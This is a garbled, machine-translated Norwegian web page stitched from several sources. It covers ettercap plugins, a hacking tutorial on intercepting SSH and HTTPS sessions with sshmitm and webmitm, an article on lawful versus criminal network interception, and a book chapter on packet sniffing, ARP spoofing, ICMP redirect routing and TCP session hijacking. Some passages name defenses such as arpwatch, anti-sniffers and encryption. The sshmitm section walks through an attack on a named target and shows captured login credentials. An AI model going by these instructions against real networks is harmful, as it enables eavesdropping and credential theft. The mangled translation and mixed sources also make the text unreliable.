Ettercap -TQP scan_poisoner //

7.8 search_promisc

Den prøver å finne om noen snuser (lytter) i promiskuøs modus. Den sender to forskjellige dårlig utformede arp-forespørsler til hvert mål i vertslisten og venter på svar. Hvis svaret kom fra målverten, er det mer eller mindre sannsynlig at målet har nettverkskortet i promiskuøs modus. Det kan generere falske alarmer. Du kan kjøre den enten fra kommandolinjen eller fra plugins-menyen. Siden den lytter etter arp-svar, vil det være bedre hvis du ikke bruker dem mens du sender arp-forespørsler.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Et eksempel på vellykket gjette på to nettverkskort i promiskuøs modus:

Utvide

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Lytter på: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.805:a 27ff:feaf:30b9/64 SSL-disseksjon trenger et gyldig "redir_command_on"-skript i etter.conf-filen Ettercap fungerer kanskje ikke riktig. /proc/sys/net/ipv6/conf/eth0/use_tempaddr er ikke satt til 0. Rettigheter falt til EUID 65534 EGID 65534... 33 plugins 42 protokolldissektorer 57 porter overvåket 20388 mac-leverandør fingeravtrykk 1766 fingeravtrykktjenester Luap OS 218 : ingen skript ble spesifisert, starter ikke opp! Randomiserer 255 verter for skanning... Skanner hele nettmasken for 255 verter... * |============================= ====================================>| 100,00 % 5 verter lagt til i vertslisten... Starter enhetlig sniffing... Bare tekstgrensesnitt aktivert... Trykk "h" for innebygd hjelp Aktiverer search_promisc-plugin... search_promisc: Søker etter promisc-NIC-er... Mindre sannsynlig sniffing-NIC : - 192.168.1.36 - 192.168.1.34 Mest sannsynlig sniffing NIC: - INGEN Lukker tekstgrensesnitt... Avslutter ettercap... Lua opprydding fullført! Samlet snusing ble stoppet.

7,9 sslstrip

Under et SSL mitm-angrep erstatter ettercap det ekte SSL-sertifikatet med sitt eget. Det falske sertifikatet opprettes i farten og alle feltene fylles ut i samsvar med det virkelige sertifikatet presentert av serveren.

(62%)

(56.5%)

(RANDOM - 0,2 %)

I denne artikkelen skal vi se på angrep som Man-in-the-Middle, eller snarere metoden
omdirigere SSH- og HTTP-trafikk ved hjelp av Man in the Middle-angrepet. La oss ikke trekke katten i halen, men la oss komme i gang.

Mann i midten (kort sagt MitM, fra russisk ganske enkelt - "angrep av mellommannen" eller "mann
i midten") er en type angrep basert på å omdirigere trafikk mellom to maskiner for å avskjære informasjon - studer, ødelegge eller endre den videre. Så det første vi trenger er dsniff-pakken (du vil se en lenke til pakken på slutten av artikkelen). Hvorfor Ja, fordi denne pakken inneholder alle nødvendige verktøy, inkludert sshmitm (omdirigere SSH-trafikk) og httpmitm (omdirigere HTTP-trafikk), som kan omgå følgende sikkerhetsskjema: så vidt du vet, protokoller med datakryptering er ganske -de er "hemmelige" (kryptering hjelper :)) og tillater ikke angrep "på toppen" av nettverkslaget. Krypteringsnøkkelen er ukjent for hackeren - det er umulig å dekryptere dataene og sett inn en kommando også. Alt virker fint, men her er hvordan
siden MitM-angrepsprogrammene (sshmitm og httpmitm) fra dsniff-pakken er i stand til å omgå dette systemet sikkerhet (du kan omgå nesten alt). Alt dette gjøres i henhold til følgende prinsipp:
den mellomliggende verten mottar forespørselen fra klienten, "forteller" den at det er serveren, og kobler deretter til den virkelige serveren.
Den andre tingen vi trenger er strake armer, den fjerde tingen - det viktigste - er lyst, og selvfølgelig et offer, det vil si datamaskinen som vi vil angripe.

Omdirigerer SSH-trafikk

Etter å ha forberedt verktøyene, forsto du hva som var hva og hvorfor :). Skaff deg sshmitm - nå vil vi omdirigere SSH-trafikk (alt du ikke forsto med den teoretiske delen - les ovenfor)
bruke den, utnytte manglene ved dagens PKI (public key infrastructure - en nøkkelstyringsordning basert på
metoder for asymmetrisk kryptografi). La oss se på syntaksen
sshmitm:

sshmitm [-d] [-I] [-p port] vert

D
tillat feilsøkingsutdata (dvs. mer avansert modus)

Jeg
øktkapring

P port
lytteport

vert
adressen til den eksterne verten hvis økter vil bli avlyttet

havn
port på den eksterne verten

Alt virker enkelt og smakfullt - det er ikke noe komplisert :). La oss begynne å implementere angrepet!

# sshmitm server.target.gov // spesifiser din SSH-server
sshmitm: videresending til server server.target.gov

Siden vi ikke har en ekte SSH-nøkkel, er kommandotolken til den angrepne
vil vise en forespørsel om å sjekke vertsnøkkelen, vil alt se omtrent slik ut:

klientmaskin$ server.target.gov
@ADVARSEL: IDENTIFIKASJON AV EKSTERN VERT ER ENDRET! @
DET ER MULIG AT NOEN GJØR NOE EKKERT!
Noen kan avlytte deg akkurat nå (man-in-the-midten-angrep)!
Det er også mulig at RSA-vertsnøkkelen nettopp har blitt endret.
Ta kontakt med systemadministratoren din.

Og så vil brukeren bestemme om han vil koble til eller ikke. Hvis ja, vil vi ha full kontroll over SSH-økten.
MEN! Hvis brukeren aldri har koblet til den bilen, kan følgende melding vises:

Ektheten til verten "server.target.gov" kan ikke fastslås
RSA nøkkel fingeravtrykk er
bla:bla:bla;bla;bla........
Er du sikker på at du vil fortsette å koble til (ja/nei)?

Her har brukeren også to valg – koble til eller ikke. Hvis ja, så avlyttet vi økten, hvis ikke, så dessverre... :(.
Generelt var angrepet vellykket hvis brukeren koblet til, og sshmitm på sin side registrerte alle pass og pålogginger, og på en veldig lesbar måte :)
Dette er naturligvis ikke den eneste SSH-sesjonsavskjæreren, men når du først blir kjent med dette, kan du enkelt mestre en annen :)

Omdirigerer HTTP-trafikk

Nå skal vi omdirigere HTTP-trafikk. Igjen vil vi trenge et tidligere valgt verktøy: httpmitm, som lytter til portene 80 (HTTP -) og 443 (HTTPS -), avskjærer WEB-forespørsler, kobler deretter til serveren og videresender forespørslene til klientdatamaskinen. Programmet genererer også SSL-nøkler og SSL-sertifikater ved hjelp av OpenSSL. Så etter å ha prøvd
kobler til nettstedet (target.gov), vil nettleseren sjekke SSL-sertifikatet. Siden sertifikatene ikke stemmer overens, vil brukerens nettleser advare om
feil SSL-sertifikat. Fra angriperens perspektiv vil det se omtrent slik ut:

#webmitm -d
webmitm: videresending transparent
webmitm: ny tilkobling fra
FÅ [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[versjon]
Tilkoblingstype]
Vert: www.target.gov
User-Agent: [system, nettleserinformasjon]
[etc, etc, etc]
Informasjonskapsel: [informasjonskapsler]

Slik ser det hele ut fra utsiden -
SSL-tilkoblingen fanges opp, og fanger opp ukrypterte data.

Konklusjon

I denne artikkelen så vi på omdirigeringen av SSH- og HTTP-trafikk ved å bruke Man in the Middle-angrepet – tydelig, i detalj, kort. Andre HTTP- og SSH-omdirigerere
Du vil mestre trafikk ved å bruke MitM raskt hvis du har mestret disse også :)). Hvis noe var uklart, så...

Avlytting av data over et nettverk er mottak av all informasjon fra en ekstern datamaskinenhet. Det kan bestå av brukerens personlige opplysninger, hans meldinger og registreringer av nettstedbesøk. Datafangst kan utføres av spyware eller ved hjelp av nettverkssniffer.

Spyware er spesiell programvare som kan registrere all informasjon som sendes over et nettverk fra en bestemt arbeidsstasjon eller enhet.

En sniffer er et program eller datateknologi som fanger opp og analyserer trafikk som går gjennom et nettverk. Snifferen lar deg koble til en nettøkt og utføre ulike operasjoner på vegne av datamaskineieren.

Hvis informasjon ikke overføres i sanntid, spyware generere rapporter som gjør det praktisk å se og analysere informasjon.

Nettavlytting kan utføres lovlig eller ulovlig. Hoveddokumentet som fastsetter lovligheten av å innhente informasjon er konvensjonen om nettkriminalitet. Den ble opprettet i Ungarn i 2001. De juridiske kravene kan variere litt fra stat til stat, men nøkkelmeldingen er den samme for alle land.

Klassifisering og metoder for å avskjære data over nettverket

I samsvar med ovenstående kan avlytting av informasjon over et nettverk deles inn i to typer: autorisert og uautorisert.

Autorisert datafangst utføres for ulike formål, alt fra å beskytte bedriftsinformasjon til å sikre nasjonal sikkerhet. Begrunnelsen for å utføre en slik operasjon bestemmes av lovgivning, spesialtjenester, politimyndigheter og spesialister administrative organisasjoner og selskapets sikkerhetstjenester.

Det finnes internasjonale standarder for å utføre dataavlytting. European Telecommunications Standards Institute har klart å harmonisere en rekke tekniske prosesser (ETSI ES 201 158 “Telecommunications security; Lawful Interception (LI); Requirements for network functions”) som avlytting av informasjon er basert på. Som et resultat ble det utviklet en systemarkitektur som hjelper hemmelige tjenestespesialister og nettverksadministratorer med lovlig å skaffe data fra nettverket. Den utviklede strukturen for implementering av dataavlytting over nettverket brukes for kablet og trådløse systemer taleanrop, samt korrespondanse per post, overføring av talemeldinger over IP, utveksling av informasjon via SMS.

Uautorisert avskjæring av data over et nettverk utføres av angripere som ønsker å ta besittelse av konfidensielle data, passord, bedriftshemmeligheter, adresser til datamaskiner på nettverket, etc. For å nå målene sine bruker hackere vanligvis en nettverkstrafikkanalysator – en sniffer. Dette programmet eller en maskinvare-programvareenhet gir svindleren muligheten til å fange opp og analysere informasjon i nettverket som offerbrukeren er koblet til, inkludert kryptert SSL-trafikk gjennom sertifikatforfalskning. Trafikkdata kan fås på forskjellige måter:

lytte til nettverksgrensesnittet,
koble en avlyttingsenhet til et kanalbrudd,
opprette en trafikkgren og duplisere den til snifferen,
ved å utføre et angrep.

Det finnes også mer komplekse teknologier for å fange opp viktig informasjon som lar en trenge inn i nettverksinteraksjoner og endre data. En slik teknikk er falske ARP-forespørsler. Essensen av metoden er å erstatte IP-adresser mellom offerets datamaskin og angriperens enhet. En annen metode som kan brukes til å fange opp data over et nettverk er falsk ruting. Det innebærer å erstatte IP-adressen til en nettverksruter med din egen adresse. Hvis en nettkriminell vet hvordan det lokale nettverket som offeret befinner seg i er organisert, kan han enkelt organisere mottak av informasjon fra brukerens maskin til IP-adressen hans. Å fange en TCP-tilkobling tjener også på en effektiv måte dataavskjæring. Angriperen avbryter kommunikasjonsøkten ved å generere og sende TCP-pakker til offerets datamaskin. Deretter gjenopprettes kommunikasjonsøkten, avlyttes og fortsettes av den kriminelle i stedet for klienten.

Gjenstand for innflytelse

Objekter for dataavlytting over nettverket kan være offentlige etater, industribedrifter, kommersielle strukturer og vanlige brukere. Innenfor en organisasjon eller bedrift kan informasjon fanges opp for å beskytte nettverksinfrastrukturen. Etterretningsbyråer og rettshåndhevelsesbyråer kan utføre masseavlytting av informasjon som overføres fra forskjellige eiere, avhengig av oppgaven.

Hvis vi snakker om nettkriminelle, kan enhver bruker eller organisasjon bli et objekt for innflytelse for å få data overført over nettverket. Med autorisert tilgang er den informative delen av informasjonen som mottas viktig, mens en angriper er mer interessert i data som kan brukes til å beslaglegge kontant eller verdifull informasjon for senere salg.

Som oftest blir brukere som kobler seg til et offentlig nettverk, for eksempel på en kafé med en hotspot, ofre for informasjonsavlytting av nettkriminelle. Wi-Fi-tilgang. En angriper kobler seg til en nettøkt ved hjelp av en sniffer, erstatter data og stjeler personlig informasjon. Les mer om hvordan dette skjer i artikkelen.

Kilde til trussel

Autorisert avlytting av informasjon i bedrifter og organisasjoner utføres av operatører av offentlig nettinfrastruktur. Deres aktiviteter er rettet mot å beskytte personopplysninger, forretningshemmeligheter og annet viktig informasjon. Juridisk kan overføringen av meldinger og filer overvåkes av etterretningstjenester, rettshåndhevelsesbyråer og ulike offentlige etater for å sikre sikkerheten til innbyggerne og staten.

Kriminelle er engasjert i ulovlig dataavlytting. For å unngå å bli et offer for en nettkriminell, må du følge noen anbefalinger fra eksperter. Du bør for eksempel ikke utføre operasjoner som krever autorisasjon og overføring av sensitive data på steder hvor tilkoblingen er til offentlige nettverk. Det er tryggere å velge nettverk med kryptering, og enda bedre - å bruke personlige 3G- og LTE-modem. Når du overfører personlige data, anbefales det å kryptere dem ved hjelp av HTTPS-protokollen eller en personlig VPN-tunnel.

Du kan beskytte datamaskinen din mot avlytting av nettverkstrafikk ved hjelp av kryptografi og anti-sniffere; Oppringt i stedet for trådløs nettverkstilgang vil redusere risikoen.

Denne leksjonen beskriver teknologier for nettverkshacking basert på avskjæring av nettverkspakker. Hackere bruker slike teknologier for å lytte til nettverkstrafikk for å stjele verdifull informasjon, for å organisere dataavskjæring med det formål å et man-i-midten-angrep, for å avskjære TCP-forbindelser, for eksempel tillate dataforfalskning, og for å utføre andre like interessante handlinger. Dessverre er de fleste av disse angrepene faktisk bare implementert for Unix-nettverk, hvor hackere kan bruke begge spesielle verktøy, og Unix-systemverktøy. Windows-nettverk har tilsynelatende blitt ignorert av hackere, og vi er tvunget til å begrense vår beskrivelse av dataavskjæringsverktøy til å sniffe programmer designet for triviell lytting av nettverkspakker. Imidlertid bør man ikke overse i det minste en teoretisk beskrivelse av slike angrep, spesielt for anti-hackere, siden kunnskap om hackingteknologiene som brukes vil bidra til å forhindre mange problemer.

Nettverkssniffing

Brukes vanligvis for å snuse Ethernet-nettverk. nettverkskort byttet til lyttemodus. Lytter Ethernet-nettverk krever å koble en datamaskin som kjører et snifferprogram til et nettverkssegment, hvoretter all nettverkstrafikk som sendes og mottas av datamaskiner i dette nettverkssegmentet blir tilgjengelig for hackeren. Det er enda enklere å avskjære trafikk fra radionettverk som bruker trådløse nettverksformidlere - i dette tilfellet trenger du ikke engang lete etter et sted å koble til kabelen. Eller en angriper kan koble seg til telefonlinjen som kobler datamaskinen til Internett-serveren, finne et praktisk sted for dette (telefonlinjer legges vanligvis i kjellere og andre sjelden besøkte steder uten beskyttelse).

For å demonstrere sniffingsteknologi vil vi bruke det svært populære snifferprogrammet SpyNet, som finnes på mange nettsider. Den offisielle nettsiden til SpyNet-programmet ligger på http://members.xoom.com/layrentiu2/, hvor du kan laste ned en demoversjon av programmet.

SpyNet-programmet består av to komponenter - CaptureNet og PipeNet. CaptureNet-programmet lar deg fange opp pakker som sendes over et Ethernet-nettverk på nettverksnivå, dvs. i form av Ethernet-rammer. PipeNet-programvaren lar deg sette sammen Ethernet-rammer til applikasjonslagspakker, gjenopprette for eksempel meldinger E-post, HTTP-protokollmeldinger (utveksling av informasjon med webserveren) og utføre andre funksjoner.

Dessverre, i SpyNet-demoen, er PipeNets muligheter begrenset til HTTP-pakkemonteringsdemoen, så vi vil ikke kunne demonstrere SpyNet i sin helhet. Vi vil imidlertid demonstrere nettverkssniff-funksjonene til SpyNet ved å bruke vårt eksperimentelle nettverk som et eksempel ved å bestå tekstfil fra Sword-2000-verten til Alex-Z-verten ved å bruke det vanlige Windows utforsker. Samtidig vil vi på A1ex-1-datamaskinen starte CaptureNet-programmet, som vil fange opp de overførte pakkene og tillate oss å lese innholdet i den overførte filen i Ethernet-rammer. I fig. 1 viser teksten til den hemmelige meldingen i filen secret.txt; vi vil prøve å finne denne teksten i de fangede Ethernet-rammene.

Ris. 1. Teksten til den hemmelige meldingen i Notisblokk-vinduet

Følg disse trinnene for å fange Ethernet-rammer:

Kjør CaptureNet-programmet på Alex-Z-datamaskinen. I det viste arbeidsvinduet til programmet, velg menykommandoen Capture * Start (Capture * Start) og start prosessen med å avskjære nettverksrammer.

Bruk Windows Utforsker, kopier security.txt-filen fra Sword-2000-datamaskinen til A1ex-3.

Etter at du har overført secret.txt-filen, velg menykommandoen Capture * Stop og stopp fangstprosessen.

De fangede Ethernet-rammene vil vises på høyre side av CaptureNet-programvinduet (Figur 2), med hver rad i topplisten som representerer en Ethernet-ramme, og under listen innholdet i den valgte rammen.

Ris. 2. Ethernet-ramme inneholder hemmelig meldingstekst

Etter å ha sett gjennom listen over oppfangede rammer, kan vi enkelt finne den som inneholder teksten vi sendte. Dette er en veldig stor hemmelighet (Dette er en veldig stor hemmelighet).

Vi understreker at dette er det enkleste eksempelet, da all avlyttet nettverkstrafikk ble registrert. CaptureNet lar deg avskjære pakker som sendes over spesifikke protokoller og til spesifikke vertsporter, velge meldinger med spesifikt innhold og akkumulere de fangede dataene i en fil. Teknikken for å utføre slike handlinger er enkel, og kan læres ved hjelp av hjelpesystemet til SpyNet-programmet.

I tillegg til primitiv nettverksavlytting, har hackere tilgang til mer sofistikerte metoder for dataavlytting. Nedenfor er en kort oversikt over slike metoder, om enn fra et teoretisk aspekt. Årsaken er at for Windows-nettverk er den praktiske implementeringen av dataavlyttingsangrep ekstremt begrenset, og settet med pålitelige verktøy for avskjæringsangrep er ganske dårlig.

Metoder for å avskjære nettverkstrafikk

Nettverkssniffing ved hjelp av nettverksanalysatorprogrammer som CaptureNet ovenfor er den første, enkleste måten å avskjære data. I tillegg til SpyNet, brukes mange verktøy for nettverkssniffing, opprinnelig utviklet med det formål å analysere nettverksaktivitet, diagnostisere nettverk, velge trafikk i henhold til angitte kriterier og andre. Et eksempel på et slikt program er tcpdump (http://www.tcpdump.org), som lar deg registrere nettverkstrafikk i en spesiell logg for senere analyse.

For å beskytte mot nettverksavlytting brukes spesielle programmer, for eksempel AntiSniff (http://www.securitysoftwaretech.com/antisniff), som er i stand til å identifisere datamaskiner på nettverket som lytter til nettverkstrafikk. For å løse problemene deres bruker antisniffer-programmer et spesielt tegn på tilstedeværelsen av lytteenheter på nettverket - nettverkskortet til snifferdatamaskinen må være i en spesiell lyttemodus. Mens de er i lyttemodus, reagerer nettverksdatamaskiner på en spesiell måte på IP-datagrammer som sendes til verten som testes. For eksempel behandler lyttende verter vanligvis all innkommende trafikk, ikke bare datagrammer som sendes til vertens adresse. Det er andre tegn som indikerer mistenkelig vertsatferd som AntiSniff kan gjenkjenne.

Falske ARP-forespørsler

For å avskjære og ta over prosessen med nettverksinteraksjon mellom to verter A og B, kan en angriper erstatte IP-adressene til interagerende verter med sin egen IP-adresse ved å sende forfalskede ARP-meldinger (Address Resolution Protocol) til vertene A og B. Du kan gjøre deg kjent med ARP-protokollen i vedlegg D, som beskriver fremgangsmåten for å løse (konvertere) vertens IP-adresse til maskinadressen (MAC-adressen) hardkodet inn i vertens nettverkskort. La oss se hvordan en hacker kan bruke ARP til å avskjære nettverkskommunikasjon mellom vertene A og B.

Angriperen bestemmer MAC-adressene til vertene A og B, for eksempel ved å bruke kommandoen nbtstat fra W2RK-pakken.

Angriperen sender meldinger til de identifiserte MAC-adressene til vertene A og B, som er forfalskede ARP-svar på forespørsler om å løse vertens IP-adresser til MAC-adressene til datamaskiner. Vert A er informert om at IP-adressen til vert B tilsvarer MAC-adressen til angriperens datamaskin; vert B informeres om at IP-adressen til vert A også tilsvarer MAC-adressen til angriperens datamaskin.

Vert A og B lagrer de mottatte MAC-adressene i sine ARP-cacher og bruker dem deretter til å sende meldinger til hverandre. Siden IP-adressene A og B tilsvarer MAC-adressen til angriperens datamaskin, kommuniserer vertene A og B, intetanende, gjennom en mellommann som kan gjøre hva som helst med meldingene deres.

For å beskytte mot slike angrep, må nettverksadministratorer vedlikeholde en database med en samsvarstabell mellom MAC-adressene og IP-adressene til deres nettverksdatamaskiner. Deretter bruker du en spesiell programvare For eksempel kan arpwatch-verktøyene (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) med jevne mellomrom kartlegge nettverket og identifisere inkonsekvenser.

På UNIX-nettverk kan denne typen falske ARP-forespørselsangrep implementeres ved hjelp av systemverktøy for overvåking og administrasjon av nettverkstrafikk, for eksempel arpredirect. Dessverre ser det ikke ut til at slike pålitelige verktøy er implementert på Windows 2000/XP-nettverk. For eksempel, på NTsecurity-nettstedet (http://www.ntsecurity.nu) kan du laste ned GrabitAII-verktøyet, presentert som et verktøy for å omdirigere trafikk mellom nettverksverter. En grunnleggende sjekk av funksjonaliteten til GrabitAII-verktøyet viser imidlertid at fullstendig suksess med å implementere funksjonene fortsatt er langt unna.

Falsk ruting

For å utføre falsk ruting, må angriperen vite noen detaljer om organiseringen av det lokale nettverket der vert A befinner seg, spesielt IP-adressen til ruteren som trafikk sendes gjennom fra vert A til B. Når angriperen vet dette, vil generere et IP-datagram der IP -avsenderadressen er definert som IP-adressen til ruteren, og mottakeren er vert A. Også inkludert i datagrammet er en ICMP Redirect-melding med adressefeltet til den nye ruteren satt til IP-adressen til angriperens datamaskin. Etter å ha mottatt en slik melding, vil vert A sende alle meldinger til IP-adressen til angriperens datamaskin.

Eksemplene ovenfor på avskjæringer (som angripernes evner er langt fra begrenset til) overbeviser om behovet for å beskytte data som overføres over nettverket hvis dataene inneholder konfidensiell informasjon. Den eneste metoden for beskyttelse mot avlytting av nettverkstrafikk er bruk av programmer som implementerer kryptografiske algoritmer og krypteringsprotokoller og forhindrer avsløring og erstatning av hemmelig informasjon. For å løse slike problemer gir kryptografi verktøy for kryptering, signering og verifisering av autentisiteten til meldinger som sendes over sikre protokoller

Den praktiske implementeringen av alle de kryptografiske metodene for å beskytte informasjonsutveksling beskrevet i kapittel 4 leveres av VPN-nettverk (Virtual Private Network). En kort oversikt over kryptografiske sikkerhetsprinsipper og -teknikker finnes i vedlegg E, og Detaljert beskrivelse kryptografiske beskyttelsesverktøy levert av PGP Desktop Security-applikasjonen (http://www.pgp.com).

TCP-tilkoblingsavskjæring

Flere effektive verktøy er laget for å utføre TCP-tilkoblingskapringangrep, men alle er implementert for Unix-plattformen, og på nettsteder presenteres disse verktøyene kun i kildekodeform. Derfor, som overbeviste utøvere av den edle årsaken til hacking, er angrep ved bruk av TCP-tilkoblingsavskjæringsmetoden ikke til stor nytte for oss. (De som liker å forstå andres programkode kan henvise til nettstedet http://www.cri.cz/~kra/index.html, hvor du kan laste ned kilde det velkjente Hunt TCP-tilkoblingsavskjæringsverktøyet fra Pavel Krauz).

Til tross for mangelen på praktiske verktøy, kan vi ikke ignorere et så interessant emne som å avskjære TCP-forbindelser, og vi vil dvele ved noen aspekter ved slike angrep. Litt informasjon om strukturen til en TCP-pakke og prosedyren for å etablere TCP-forbindelser er gitt i vedlegg D i denne boken, men her vil vi fokusere på spørsmålet – hva er det egentlig som gjør at hackere kan utføre TCP-tilkoblingsangrep? La oss vurdere dette emnet mer detaljert, hovedsakelig stole på diskusjonen i og.

TCP-protokollen (Transmission Control Protocol) er en av de grunnleggende OSI-transportlagprotokollene som lar deg etablere logiske forbindelser over en virtuell kommunikasjonskanal. Over denne kanalen blir pakker sendt og mottatt med sekvensen registrert, strømmen av pakker kontrolleres, retransmisjon av forvrengte pakker organiseres, og på slutten av økten brytes kommunikasjonskanalen. TCP-protokollen er den eneste kjerneprotokollen i TCP/IP-familien som har et avansert meldingsidentifikasjon og tilkoblingssystem.

For å identifisere en TCP-pakke er det to 32-bits identifikatorer i TCP-overskriften, som også fungerer som pakketellere, kalt sekvensnummer og bekreftelsesnummer. Vi vil også være interessert i ett felt til i TCP-pakken, kalt kontrollbiter. Dette 6-bits feltet inkluderer følgende kontrollbiter (i rekkefølge fra venstre mot høyre):

URG - hasteflagg;

ACK - bekreftelsesflagg;

PSH - bære flagg;

RST - flagg for reetablering av tilkobling;

SYN - synkroniseringsflagg;

FIN - flagg for tilkoblingsavslutning.

La oss se på prosedyren for å opprette en TCP-tilkobling.

1. Hvis vert A trenger å opprette en TCP-forbindelse med vert B, sender vert A vert B følgende melding:

A -> B: SYN, ISSa

Dette betyr at meldingen som sendes av vert A har SYN-flagget (Synkroniser sekvensnummer) satt, og sekvensnummerfeltet er satt til den innledende 32-bits verdien ISSa (Initial Sequence Number).

2. Som svar på forespørselen mottatt fra vert A, svarer vert B med en melding hvor SYN-biten er satt og ACK-biten er satt. I sekvensnummerfeltet setter vert B sin innledende tellerverdi - ISSb; feltet for bekreftelsesnummer vil da inneholde ISSa-verdien mottatt i den første pakken fra vert A, økt med én. Så vert B svarer med denne meldingen:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Til slutt sender vert A en melding til vert B, der: ACK-biten er satt; sekvensnummerfeltet inneholder verdien ISSa + 1; Bekreftelsesnummerfeltet inneholder verdien ISSb + 1. Etter dette anses TCP-forbindelsen mellom vertene A og B som etablert:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Nå kan vert A sende datapakker til vert B over den nyopprettede virtuelle TCP-kanalen:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATA

Her står DATA for data.

Fra algoritmen for å opprette en TCP-forbindelse diskutert ovenfor, kan det sees at de eneste identifikatorene til TCP-abonnenter og en TCP-forbindelse er to 32-bits parametere for sekvensnummeret og bekreftelsesnummeret - ISSa og ISSb. Derfor, hvis en hacker klarer å finne ut gjeldende verdier til ISSa- og ISSb-feltene, vil ingenting hindre ham i å generere en forfalsket TCP-pakke. Dette betyr at en hacker bare trenger å velge gjeldende verdier for ISSa- og ISSb-parametrene til en TCP-pakke for en gitt TCP-tilkobling, sende pakken fra en hvilken som helst Internettvert på vegne av klienten til denne TCP-tilkoblingen, og denne pakken vil oppfattes som riktig!

Faren for slik TCP-pakkeforfalskning er også viktig fordi høynivå-FTP- og TELNET-protokollene er implementert basert på TCP-protokollen, og identifiseringen av FTP- og TELNET-pakkeklienter er helt basert på TCP-protokollen.

I tillegg, siden FTP- og TELNET-protokollene ikke kontrollerer IP-adressene til meldingsavsendere, vil FTP- eller TELNET-serverne etter å ha mottatt en forfalsket pakke sende en svarmelding til IP-adressen til hackerverten spesifisert i den falske pakken. Etter dette vil hacker-verten begynne å jobbe med FTP- eller TELNET-serveren fra sin IP-adresse, men med rettighetene til en lovlig tilkoblet bruker, som igjen vil miste kontakten med serveren på grunn av manglende samsvar mellom tellere.

For å utføre angrepet beskrevet ovenfor, er en nødvendig og tilstrekkelig betingelse kunnskap om de to gjeldende 32-bits parametrene ISSa og ISSb som identifiserer TCP-forbindelsen. La oss vurdere mulige måter motta dem. I tilfellet når hackerverten er koblet til det angrepne nettverkssegmentet, er oppgaven med å skaffe verdiene til ISSa og ISSb triviell og kan løses ved å analysere nettverkstrafikken. Derfor er det nødvendig å tydelig forstå at TCP-protokollen i prinsippet tillater å beskytte en forbindelse bare hvis det er umulig for en angriper å avskjære meldinger som sendes over denne forbindelsen, det vil si bare i tilfellet når hackerverten er koblet til et nettverkssegment som er forskjellig fra abonnentsegmentet til TCP-forbindelsen.

Derfor er intersegment-angrep av størst interesse for en hacker når angriperen og hans mål befinner seg i forskjellige nettverkssegmenter. I dette tilfellet er oppgaven med å skaffe verdiene til ISSa og ISSb ikke triviell. For å løse dette problemet er det nå bare to metoder som er oppfunnet.

Matematisk prediksjon av startverdien til TCP-tilkoblingsparametere ved ekstrapolering av tidligere verdier av ISSa og ISSb.

Utnyttelse av sårbarheter ved identifisering av TCP-tilkoblingsabonnenter på Unix rsh-servere.

Den første oppgaven løses gjennom dybdestudier av implementeringen av TCP-protokollen i ulike operativsystemer og har nå en rent teoretisk betydning. Det andre problemet løses ved hjelp av sårbarheter Unix-systemer ved å identifisere pålitelige verter. (Klitert med hensyn til en gitt vert A er en nettverksvert B hvis bruker kan koble til vert A uten autentisering ved å bruke r-tjenesten til vert A). Ved å manipulere parametrene til TCP-pakker, kan en hacker prøve å etterligne en pålitelig vert og avskjære en TCP-forbindelse med den angrepne verten.

Alt dette er veldig interessant, men de praktiske resultatene av denne typen forskning er ennå ikke synlige. Derfor anbefaler vi alle som ønsker å fordype seg dypere i dette emnet til å gå til boken, hvor informasjonen presentert ovenfor hovedsakelig ble hentet.

Konklusjon

Å avskjære nettverksdata er den mest effektive metoden for nettverkshacking, og lar en hacker få tak i nesten all informasjon som sirkulerer på nettverket. Den største praktiske utviklingen er oppnådd ved å snuseverktøy, d.v.s. lytte til nettverk; Vi kan imidlertid ikke ignorere metoder for å avskjære nettverksdata, utført ved å forstyrre den normale funksjonen til nettverket for å omdirigere trafikk til en hackervert, spesielt metoder for å avskjære TCP-tilkoblinger. Men i praksis har de sistnevnte metodene ennå ikke fått tilstrekkelig utvikling og må forbedres.

En anti-hacker bør vite at den eneste redningen fra dataavlytting er kryptering, dvs. kryptografiske beskyttelsesmetoder. Når du sender en melding over nettverket, bør du på forhånd anta at nettverkets kabelsystem er absolutt sårbart, og enhver hacker koblet til nettverket vil kunne fange opp alle overførte hemmelige meldinger fra det. Det er to teknologier for å løse dette problemet - å lage et VPN-nettverk og kryptere selve meldingene. Alle disse oppgavene er veldig enkle å løse ved å bruke programvarepakken PGP Desktop Security (beskrivelsen finner du for eksempel i).

Populært i kategorien: